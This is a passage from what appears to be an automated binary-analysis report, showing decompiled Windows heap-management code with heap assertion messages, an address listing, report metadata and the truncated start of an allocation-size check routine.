						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
						_v36 =  *(_t452 + 0x14);
						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
						_t256 =  *(_t452 + 0x14);
						__eflags = _t256 - 0x7f000;
						if(_t256 >= 0x7f000) {
							_t142 = _t553 + 0x1ec;
							 *_t142 =  *(_t553 + 0x1ec) - _t256;
							__eflags =  *_t142;
							_t256 =  *(_t452 + 0x14);
						}
						_t513 = _v48;
						_t445 = _t445 + (_t256 >> 3) + 0x20;
						_a4 = _t445;
						_v40 = 1;
					} else {
						_t27 =  &_v36;
						 *_t27 = _v36 & 0x00000000;
						__eflags =  *_t27;
					}
					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
						_v44 = _t513;
						_t262 = E00FDA9EF(_t541, _t513);
						__eflags = _a8;
						_v32 = _t262;
						if(_a8 != 0) {
							__eflags = _t262;
							if(_t262 == 0) {
								goto L19;
							}
						}
						__eflags =  *0x10c8748 - 1;
						if( *0x10c8748 >= 1) {
							__eflags = _t262;
							if(_t262 == 0) {
								_t415 =  *[fs:0x30];
								__eflags =  *(_t415 + 0xc);
								if( *(_t415 + 0xc) == 0) {
									_push("HEAP: ");
									E00FDB150();
								} else {
									E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E00FDB150();
								__eflags =  *0x10c7bc8;
								if( *0x10c7bc8 == 0) {
									__eflags = 1;
									E01092073(_t445, 1, _t541, 1);
								}
								_t513 = _v48;
								_t445 = _a4;
							}
						}
						_t350 = _v40;
						_t480 = _t445 << 3;
						_v20 = _t480;
						_t481 = _t480 + _t513;
						_v24 = _t481;
						__eflags = _t350;
						if(_t350 == 0) {
							_t481 = _t481 + 0xfffffff0;
							__eflags = _t481;
						}
						_t483 = (_t481 & 0xfffff000) - _v44;
						__eflags = _t483;
						_v52 = _t483;
						if(_t483 == 0) {
							__eflags =  *0x10c8748 - 1;
							if( *0x10c8748 < 1) {
								goto L9;
							}
							__eflags = _t350;
							goto L146;
						} else {
							_t352 = E0100174B( &_v44,  &_v52, 0x4000);
							__eflags = _t352;
							if(_t352 < 0) {
								goto L94;
							}
							_t353 = E00FF7D50();
							_t447 = 0x7ffe0380;
							__eflags = _t353;
							if(_t353 != 0) {
								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t356 = 0x7ffe0380;
							}
							__eflags =  *_t356;
							if( *_t356 != 0) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0x240) & 0x00000001;
								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
									E010914FB(_t447, _t553, _v44, _v52, 5);
								}
							}
							_t358 = _v32;
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t484 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t484 - 0x7f000;
							if(_t484 >= 0x7f000) {
								_t90 = _t553 + 0x1ec;
								 *_t90 =  *(_t553 + 0x1ec) - _t484;
								__eflags =  *_t90;
							}
							E00FD9373(_t553, _t358);
							_t486 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E00FD9819(_t486);
							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
							_t366 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t366 - 0x7f000;
							if(_t366 >= 0x7f000) {
								_t104 = _t553 + 0x1ec;
								 *_t104 =  *(_t553 + 0x1ec) + _t366;
								__eflags =  *_t104;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t533 = _v52 + _v44;
								_v32 = _t533;
								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
								__eflags = _v24 - _v52 + _v44;
								if(_v24 == _v52 + _v44) {
									__eflags =  *(_t553 + 0x4c);
									if( *(_t553 + 0x4c) != 0) {
										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
									}
								} else {
									_t449 = 0;
									_t533[3] = 0;
									_t533[1] = 0;
									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t491 = _t394;
									 *_t533 = _t394;
									__eflags =  *0x10c8748 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t491 - 1;
										if(_t491 <= 1) {
											_t404 =  *[fs:0x30];
											__eflags =  *(_t404 + 0xc);
											if( *(_t404 + 0xc) == 0) {
												_push("HEAP: ");
												E00FDB150();
											} else {
												E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E00FDB150();
											_pop(_t491);
											__eflags =  *0x10c7bc8 - _t449; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												_t491 = 1;
												E01092073(_t449, 1, _t541, 0);
											}
											_t533 = _v32;
										}
									}
									_t533[1] = _t449;
									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
										_t402 = (_t533 - _t541 >> 0x10) + 1;
										_v16 = _t402;
										__eflags = _t402 - 0xfe;
										if(_t402 >= 0xfe) {
											_push(_t491);
											_push(_t449);
											E0109A80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
											_t533 = _v48;
											_t402 = _v32;
										}
										_t449 = _t402;
									}
									_t533[3] = _t449;
									E00FFA830(_t553, _t533,  *_t533 & 0x0000ffff);
									_t447 = 0x7ffe0380;
								}
							}
							_t367 = E00FF7D50();
							__eflags = _t367;
							if(_t367 != 0) {
								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t370 = _t447;
							}
							__eflags =  *_t370;
							if( *_t370 != 0) {
								_t371 =  *[fs:0x30];
								__eflags =  *(_t371 + 0x240) & 1;
								if(( *(_t371 + 0x240) & 1) != 0) {
									__eflags = E00FF7D50();
									if(__eflags != 0) {
										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E01091411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
								}
							}
							_t372 = E00FF7D50();
							_t546 = 0x7ffe038a;
							_t446 = 0x230;
							__eflags = _t372;
							if(_t372 != 0) {
								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t246 = 0x7ffe038a;
							}
							__eflags =  *_t246;
							if( *_t246 == 0) {
								goto L7;
							} else {
								__eflags = E00FF7D50();
								if(__eflags != 0) {
									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
									__eflags = _t546;
								}
								_push( *_t546 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								goto L120;
							}
						}
					} else {
						L19:
						_t31 = _t513 + 0x101f; // 0x101f
						_t455 = _t31 & 0xfffff000;
						_t32 = _t513 + 0x28; // 0x28
						_v44 = _t455;
						__eflags = _t455 - _t32;
						if(_t455 == _t32) {
							_t455 = _t455 + 0x1000;
							_v44 = _t455;
						}
						_t265 = _t445 << 3;
						_v24 = _t265;
						_t266 = _t265 + _t513;
						__eflags = _v40;
						_v20 = _t266;
						if(_v40 == 0) {
							_t266 = _t266 + 0xfffffff0;
							__eflags = _t266;
						}
						_t267 = _t266 & 0xfffff000;
						_v52 = _t267;
						__eflags = _t267 - _t455;
						if(_t267 < _t455) {
							__eflags =  *0x10c8748 - 1; // 0x0
							if(__eflags < 0) {
								L9:
								_t450 = _t553;
								L10:
								_push(_t445);
								goto L11;
							}
							__eflags = _v40;
							L146:
							if(__eflags == 0) {
								goto L9;
							}
							_t270 =  *[fs:0x30];
							__eflags =  *(_t270 + 0xc);
							if( *(_t270 + 0xc) == 0) {
								_push("HEAP: ");
								E00FDB150();
							} else {
								E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E00FDB150();
							__eflags =  *0x10c7bc8;
							if( *0x10c7bc8 == 0) {
								__eflags = 0;
								E01092073(_t445, 1, _t541, 0);
							}
							L152:
							_t445 = _a4;
							L153:
							_t513 = _v48;
							goto L9;
						}
						_v32 = _t267;
						_t280 = _t267 - _t455;
						_v32 = _v32 - _t455;
						__eflags = _a8;
						_t460 = _v32;
						_v52 = _t460;
						if(_a8 != 0) {
							L27:
							__eflags = _t280;
							if(_t280 == 0) {
								L33:
								_t446 = 0;
								__eflags = _v40;
								if(_v40 == 0) {
									_t468 = _v44 + _v52;
									_v36 = _t468;
									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
									__eflags = _v20 - _v52 + _v44;
									if(_v20 == _v52 + _v44) {
										__eflags =  *(_t553 + 0x4c);
										if( *(_t553 + 0x4c) != 0) {
											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
										}
									} else {
										_t468[3] = 0;
										_t468[1] = 0;
										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
										_t521 = _t317;
										 *_t468 = _t317;
										__eflags =  *0x10c8748 - 1; // 0x0
										if(__eflags >= 0) {
											__eflags = _t521 - 1;
											if(_t521 <= 1) {
												_t327 =  *[fs:0x30];
												__eflags =  *(_t327 + 0xc);
												if( *(_t327 + 0xc) == 0) {
													_push("HEAP: ");
													E00FDB150();
												} else {
													E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
												}
												_push("(LONG)FreeEntry->Size > 1");
												E00FDB150();
												__eflags =  *0x10c7bc8 - _t446; // 0x0
												if(__eflags == 0) {
													__eflags = 1;
													E01092073(_t446, 1, _t541, 1);
												}
												_t468 = _v36;
											}
										}
										_t468[1] = _t446;
										_t522 =  *((intOrPtr*)(_t541 + 0x18));
										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
											_t320 = _t446;
										} else {
											_t320 = (_t468 - _t541 >> 0x10) + 1;
											_v12 = _t320;
											__eflags = _t320 - 0xfe;
											if(_t320 >= 0xfe) {
												_push(_t468);
												_push(_t446);
												E0109A80D(_t522, 3, _t468, _t541);
												_t468 = _v52;
												_t320 = _v28;
											}
										}
										_t468[3] = _t320;
										E00FFA830(_t553, _t468,  *_t468 & 0x0000ffff);
									}
								}
								E00FFB73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
								E00FFA830(_t553, _v64, _v24);
								_t286 = E00FF7D50();
								_t542 = 0x7ffe0380;
								__eflags = _t286;
								if(_t286 != 0) {
									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t289 = 0x7ffe0380;
								}
								__eflags =  *_t289;
								if( *_t289 != 0) {
									_t290 =  *[fs:0x30];
									__eflags =  *(_t290 + 0x240) & 1;
									if(( *(_t290 + 0x240) & 1) != 0) {
										__eflags = E00FF7D50();
										if(__eflags != 0) {
											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E01091411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
									}
								}
								_t291 = E00FF7D50();
								_t543 = 0x7ffe038a;
								__eflags = _t291;
								if(_t291 != 0) {
									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t246 = 0x7ffe038a;
								}
								__eflags =  *_t246;
								if( *_t246 != 0) {
									__eflags = E00FF7D50();
									if(__eflags != 0) {
										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags = _t543;
									}
									_push( *_t543 & 0x000000ff);
									_push(_t446);
									_push(_t446);
									L120:
									_push( *(_t553 + 0x74) << 3);
									_push(_v52);
									_t246 = E01091411(_t446, _t553, _v44, __eflags);
								}
								goto L7;
							}
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t339 = E0100174B( &_v44,  &_v52, 0x4000);
							__eflags = _t339;
							if(_t339 < 0) {
								L94:
								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									goto L153;
								}
								E00FFB73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
								goto L152;
							}
							_t344 = E00FF7D50();
							__eflags = _t344;
							if(_t344 != 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t347 = 0x7ffe0380;
							}
							__eflags =  *_t347;
							if( *_t347 != 0) {
								_t348 =  *[fs:0x30];
								__eflags =  *(_t348 + 0x240) & 1;
								if(( *(_t348 + 0x240) & 1) != 0) {
									E010914FB(_t445, _t553, _v44, _v52, 6);
								}
							}
							_t513 = _v48;
							goto L33;
						}
						__eflags =  *_v12 - 3;
						_t513 = _v48;
						if( *_v12 == 3) {
							goto L27;
						}
						__eflags = _t460;
						if(_t460 == 0) {
							goto L9;
						}
						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
							goto L9;
						}
						goto L27;
					}
				}
				_t445 = _a4;
				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t513 = __edx;
					goto L10;
				}
				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
				_v20 = _t433;
				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
					_t513 = _t539;
					goto L9;
				} else {
					_t437 = E00FF99BF(__ecx, __edx,  &_a4, 0);
					_t445 = _a4;
					_t514 = _t437;
					_v56 = _t514;
					if(_t445 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E00FFA830(__ecx, _t514, _t445);
						_t506 =  *(_t553 + 0x238);
						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
						_t246 = _t506 >> 4;
						if(_t551 < _t506 - _t246) {
							_t508 =  *(_t553 + 0x23c);
							_t246 = _t508 >> 2;
							__eflags = _t551 - _t508 - _t246;
							if(_t551 > _t508 - _t246) {
								_t246 = E0100ABD8(_t553);
								 *(_t553 + 0x23c) = _t551;
								 *(_t553 + 0x238) = _t551;
							}
						}
						goto L7;
					}
				}
			}



















































































                    0x00ffa309
                    0x00ffa316
                    0x00ffa319
                    0x00ffa31d
                    0x00ffa32d
                    0x00ffa331
                    0x01041e0d
                    0x01041e10
                    0x00ffa3cb
                    0x00ffa3cb
                    0x00ffa3bd
                    0x00ffa3c3
                    0x00ffa3c3
                    0x00ffa33a
                    0x01041e17
                    0x01041e1b
                    0x01041e1d
                    0x01041e2f
                    0x01041e34
                    0x01041e36
                    0x01041e3c
                    0x01041e3c
                    0x01041e3c
                    0x01041e3c
                    0x01041e36
                    0x01041e42
                    0x01041e45
                    0x01041e47
                    0x00ffa3f8
                    0x00ffa3f8
                    0x00ffa3fb
                    0x00ffa3fd
                    0x01041e50
                    0x00ffa403
                    0x00ffa411
                    0x00ffa411
                    0x00ffa411
                    0x00ffa41e
                    0x00ffa420
                    0x00ffa424
                    0x00ffa427
                    0x00ffa7c9
                    0x00ffa7cd
                    0x00ffa7d2
                    0x00ffa7d9
                    0x00ffa7e0
                    0x00ffa7e3
                    0x00ffa7ed
                    0x00ffa7f3
                    0x00ffa7f9
                    0x00ffa7ff
                    0x00ffa802
                    0x00ffa807
                    0x00ffa809
                    0x00ffa809
                    0x00ffa809
                    0x00ffa80f
                    0x00ffa80f
                    0x00ffa812
                    0x00ffa81c
                    0x00ffa821
                    0x00ffa824
                    0x00ffa42d
                    0x00ffa42d
                    0x00ffa42d
                    0x00ffa42d
                    0x00ffa42d
                    0x00ffa436
                    0x00ffa43a
                    0x00ffa609
                    0x00ffa60d
                    0x00ffa612
                    0x00ffa616
                    0x00ffa61a
                    0x01041e57
                    0x01041e59
                    0x00000000
                    0x00000000
                    0x01041e5f
                    0x00ffa620
                    0x00ffa627
                    0x01041e64
                    0x01041e66
                    0x01041e6c
                    0x01041e72
                    0x01041e76
                    0x01041e95
                    0x01041e9a
                    0x01041e78
                    0x01041e8d
                    0x01041e92
                    0x01041ea0
                    0x01041ea5
                    0x01041eaa
                    0x01041eb2
                    0x01041eb6
                    0x01041eb9
                    0x01041eb9
                    0x01041ebe
                    0x01041ec2
                    0x01041ec2
                    0x01041e66
                    0x00ffa62d
                    0x00ffa633
                    0x00ffa636
                    0x00ffa63a
                    0x00ffa63c
                    0x00ffa640
                    0x00ffa642
                    0x00ffa644
                    0x00ffa644
                    0x00ffa644
                    0x00ffa64d
                    0x00ffa64d
                    0x00ffa651
                    0x00ffa655
                    0x01041eca
                    0x01041ed1
                    0x00000000
                    0x00000000
                    0x01041ed7
                    0x00000000
                    0x00ffa65b
                    0x00ffa669
                    0x00ffa66e
                    0x00ffa670
                    0x00000000
                    0x00000000
                    0x00ffa676
                    0x00ffa67b
                    0x00ffa680
                    0x00ffa682
                    0x01041f1a
                    0x00ffa688
                    0x00ffa688
                    0x00ffa688
                    0x00ffa68a
                    0x00ffa68d
                    0x01041f24
                    0x01041f2a
                    0x01041f31
                    0x01041f43
                    0x01041f43
                    0x01041f31
                    0x00ffa693
                    0x00ffa697
                    0x00ffa69d
                    0x00ffa6a0
                    0x00ffa6a6
                    0x00ffa6a8
                    0x00ffa6a8
                    0x00ffa6a8
                    0x00ffa6a8
                    0x00ffa6b2
                    0x00ffa6b7
                    0x00ffa6c1
                    0x00ffa6c6
                    0x00ffa6d2
                    0x00ffa6d9
                    0x00ffa6e3
                    0x00ffa6e6
                    0x00ffa6eb
                    0x00ffa6ed
                    0x00ffa6ed
                    0x00ffa6ed
                    0x00ffa6ed
                    0x00ffa6f3
                    0x00ffa6f8
                    0x00ffa702
                    0x00ffa70a
                    0x00ffa70e
                    0x00ffa71a
                    0x00ffa71e
                    0x01041fcb
                    0x01041fcf
                    0x01041fdd
                    0x01041fe3
                    0x01041fe3
                    0x00ffa724
                    0x00ffa728
                    0x00ffa72a
                    0x00ffa72d
                    0x00ffa737
                    0x00ffa73a
                    0x00ffa73c
                    0x00ffa742
                    0x00ffa748
                    0x01041f4d
                    0x01041f50
                    0x01041f56
                    0x01041f5c
                    0x01041f5f
                    0x01041f7e
                    0x01041f83
                    0x01041f61
                    0x01041f76
                    0x01041f7b
                    0x01041f89
                    0x01041f8e
                    0x01041f93
                    0x01041f94
                    0x01041f9a
                    0x01041f9c
                    0x01041f9e
                    0x01041fa1
                    0x01041fa1
                    0x01041fa6
                    0x01041fa6
                    0x01041f50
                    0x00ffa74e
                    0x00ffa751
                    0x00ffa754
                    0x00ffa75d
                    0x00ffa75e
                    0x00ffa762
                    0x00ffa767
                    0x01041faf
                    0x01041fb0
                    0x01041fb9
                    0x01041fbe
                    0x01041fc2
                    0x01041fc2
                    0x00ffa76d
                    0x00ffa76d
                    0x00ffa775
                    0x00ffa778
                    0x00ffa77d
                    0x00ffa77d
                    0x00ffa71e
                    0x00ffa782
                    0x00ffa787
                    0x00ffa789
                    0x01041ff3
                    0x00ffa78f
                    0x00ffa78f
                    0x00ffa78f
                    0x00ffa791
                    0x00ffa794
                    0x01041ffd
                    0x01042006
                    0x0104200c
                    0x01042017
                    0x01042019
                    0x01042024
                    0x01042024
                    0x01042024
                    0x01042047
                    0x01042047
                    0x0104200c
                    0x00ffa79a
                    0x00ffa79f
                    0x00ffa7a4
                    0x00ffa7a9
                    0x00ffa7ab
                    0x0104205a
                    0x00ffa7b1
                    0x00ffa7b1
                    0x00ffa7b1
                    0x00ffa7b3
                    0x00ffa7b6
                    0x00000000
                    0x00ffa7bc
                    0x01042066
                    0x01042068
                    0x01042073
                    0x01042073
                    0x01042073
                    0x01042078
                    0x01042079
                    0x0104207d
                    0x00000000
                    0x0104207d
                    0x00ffa7b6
                    0x00ffa440
                    0x00ffa440
                    0x00ffa440
                    0x00ffa446
                    0x00ffa44c
                    0x00ffa44f
                    0x00ffa453
                    0x00ffa455
                    0x010420b3
                    0x010420b9
                    0x010420b9
                    0x00ffa45d
                    0x00ffa460
                    0x00ffa464
                    0x00ffa466
                    0x00ffa46b
                    0x00ffa46f
                    0x00ffa471
                    0x00ffa471
                    0x00ffa471
                    0x00ffa474
                    0x00ffa479
                    0x00ffa47d
                    0x00ffa47f
                    0x01042229
                    0x0104222f
                    0x00ffa3c8
                    0x00ffa3c8
                    0x00ffa3ca
                    0x00ffa3ca
                    0x00000000
                    0x00ffa3ca
                    0x01042235
                    0x0104223a
                    0x0104223a
                    0x00000000
                    0x00000000
                    0x01042240
                    0x01042246
                    0x0104224a
                    0x01042269
                    0x0104226e
                    0x0104224c
                    0x01042261
                    0x01042266
                    0x01042274
                    0x01042279
                    0x0104227e
                    0x01042286
                    0x01042288
                    0x0104228d
                    0x0104228d
                    0x01042292
                    0x01042292
                    0x01042295
                    0x01042295
                    0x00000000
                    0x01042295
                    0x00ffa485
                    0x00ffa489
                    0x00ffa48b
                    0x00ffa48f
                    0x00ffa493
                    0x00ffa497
                    0x00ffa49b
                    0x00ffa4bb
                    0x00ffa4bb
                    0x00ffa4bd
                    0x00ffa4ff
                    0x00ffa4ff
                    0x00ffa501
                    0x00ffa505
                    0x00ffa50f
                    0x00ffa517
                    0x00ffa51b
                    0x00ffa527
                    0x00ffa52b
                    0x01042182
                    0x01042185
                    0x01042193
                    0x01042199
                    0x01042199
                    0x00ffa531
                    0x00ffa535
                    0x00ffa538
                    0x00ffa548
                    0x00ffa54b
                    0x00ffa54d
                    0x00ffa553
                    0x00ffa559
                    0x01042100
                    0x01042103
                    0x01042109
                    0x0104210f
                    0x01042112
                    0x01042131
                    0x01042136
                    0x01042114
                    0x01042129
                    0x0104212e
                    0x0104213c
                    0x01042141
                    0x01042147
                    0x0104214d
                    0x01042151
                    0x01042154
                    0x01042154
                    0x01042159
                    0x01042159
                    0x01042103
                    0x00ffa55f
                    0x00ffa562
                    0x00ffa565
                    0x00ffa567
                    0x01042162
                    0x00ffa56d
                    0x00ffa574
                    0x00ffa575
                    0x00ffa579
                    0x00ffa57e
                    0x01042169
                    0x0104216a
                    0x01042170
                    0x01042175
                    0x01042179
                    0x01042179
                    0x00ffa57e
                    0x00ffa584
                    0x00ffa58f
                    0x00ffa58f
                    0x00ffa52b
                    0x00ffa5ad
                    0x00ffa5bc
                    0x00ffa5c1
                    0x00ffa5c6
                    0x00ffa5cb
                    0x00ffa5cd
                    0x010421a9
                    0x00ffa5d3
                    0x00ffa5d3
                    0x00ffa5d3
                    0x00ffa5d5
                    0x00ffa5d8
                    0x010421b3
                    0x010421bc
                    0x010421c2
                    0x010421cd
                    0x010421cf
                    0x010421da
                    0x010421da
                    0x010421da
                    0x010421f7
                    0x010421f7
                    0x010421c2
                    0x00ffa5de
                    0x00ffa5e3
                    0x00ffa5e8
                    0x00ffa5ea
                    0x0104220a
                    0x00ffa5f0
                    0x00ffa5f0
                    0x00ffa5f0
                    0x00ffa5f2
                    0x00ffa5f5
                    0x01042219
                    0x0104221b
                    0x0104208c
                    0x0104208c
                    0x0104208c
                    0x01042095
                    0x01042096
                    0x01042097
                    0x01042098
                    0x010420a4
                    0x010420a5
                    0x010420a9
                    0x010420a9
                    0x00000000
                    0x00ffa5f5
                    0x00ffa4bf
                    0x00ffa4d3
                    0x00ffa4d8
                    0x00ffa4da
                    0x01041ede
                    0x01041ede
                    0x01041ee4
                    0x01041ee9
                    0x00000000
                    0x00000000
                    0x01041f07
                    0x00000000
                    0x01041f07
                    0x00ffa4e0
                    0x00ffa4e5
                    0x00ffa4e7
                    0x010420cb
                    0x00ffa4ed
                    0x00ffa4ed
                    0x00ffa4ed
                    0x00ffa4f2
                    0x00ffa4f5
                    0x010420d5
                    0x010420de
                    0x010420e4
                    0x010420f6
                    0x010420f6
                    0x010420e4
                    0x00ffa4fb
                    0x00000000
                    0x00ffa4fb
                    0x00ffa4a1
                    0x00ffa4a4
                    0x00ffa4a8
                    0x00000000
                    0x00000000
                    0x00ffa4aa
                    0x00ffa4ac
                    0x00000000
                    0x00000000
                    0x00ffa4b2
                    0x00ffa4b5
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00ffa4b5
                    0x00ffa43a
                    0x00ffa340
                    0x00ffa346
                    0x00ffa600
                    0x00000000
                    0x00ffa600
                    0x00ffa34f
                    0x00ffa351
                    0x00ffa358
                    0x00ffa3c6
                    0x00000000
                    0x00ffa371
                    0x00ffa37a
                    0x00ffa37f
                    0x00ffa382
                    0x00ffa384
                    0x00ffa394
                    0x00000000
                    0x00ffa396
                    0x00ffa399
                    0x00ffa3a7
                    0x00ffa3b0
                    0x00ffa3b4
                    0x00ffa3bb
                    0x00ffa3d2
                    0x00ffa3da
                    0x00ffa3df
                    0x00ffa3e1
                    0x00ffa3e5
                    0x00ffa3ea
                    0x00ffa3f0
                    0x00ffa3f0
                    0x00ffa3e1
                    0x00000000
                    0x00ffa3bb
                    0x00ffa394

                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                    • API String ID: 0-523794902
                    • Opcode ID: 391d85ba1b216c7df847f74bbb8627f5151234639e9e5816979afc9d2be50838
                    • Instruction ID: 574466d446c766c088224f41f58dea228aa5916b3ec43bd191de2eed221a2fe8
                    • Opcode Fuzzy Hash: 391d85ba1b216c7df847f74bbb8627f5151234639e9e5816979afc9d2be50838
                    • Instruction Fuzzy Hash: 7142E0B16083459FC715DF28C884B3ABBE5BF88704F18496DF5898B362D738E981DB52
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01092D82, Relevance: 7.7, Strings: 6, Instructions: 228COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 64%
                    			E01092D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t83;
				signed char _t89;
				intOrPtr _t90;
				signed char _t101;
				signed int _t102;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				intOrPtr _t108;
				intOrPtr _t112;
				short* _t130;
				short _t131;
				signed int _t148;
				intOrPtr _t149;
				signed int* _t154;
				short* _t165;
				signed int _t171;
				void* _t182;

				_push(0x44);
				_push(0x10b0e80);
				E0102D0E8(__ebx, __edi, __esi);
				_t177 = __edx;
				_t181 = __ecx;
				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
				 *((char*)(_t182 - 0x1d)) = 0;
				 *(_t182 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t182 - 4)) = 0;
					 *((intOrPtr*)(_t182 - 4)) = 1;
					_t83 = E00FD40E1("RtlAllocateHeap");
					__eflags = _t83;
					if(_t83 == 0) {
						L48:
						 *(_t182 - 0x24) = 0;
						L49:
						 *((intOrPtr*)(_t182 - 4)) = 0;
						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
						E010930C4();
						goto L50;
					}
					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
					 *(_t182 - 0x28) = _t89;
					 *(_t182 - 0x3c) = _t89;
					_t177 =  *(_t182 + 8);
					__eflags = _t177;
					if(_t177 == 0) {
						_t171 = 1;
						__eflags = 1;
					} else {
						_t171 = _t177;
					}
					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
					__eflags = _t148 - 0x10;
					if(_t148 < 0x10) {
						_t148 = 0x10;
					}
					_t149 = _t148 + 8;
					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
					__eflags = _t149 - _t177;
					if(_t149 < _t177) {
						L44:
						_t90 =  *[fs:0x30];
						__eflags =  *(_t90 + 0xc);
						if( *(_t90 + 0xc) == 0) {
							_push("HEAP: ");
							E00FDB150();
						} else {
							E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t181 + 0x78)));
						E00FDB150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
						goto L48;
					} else {
						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
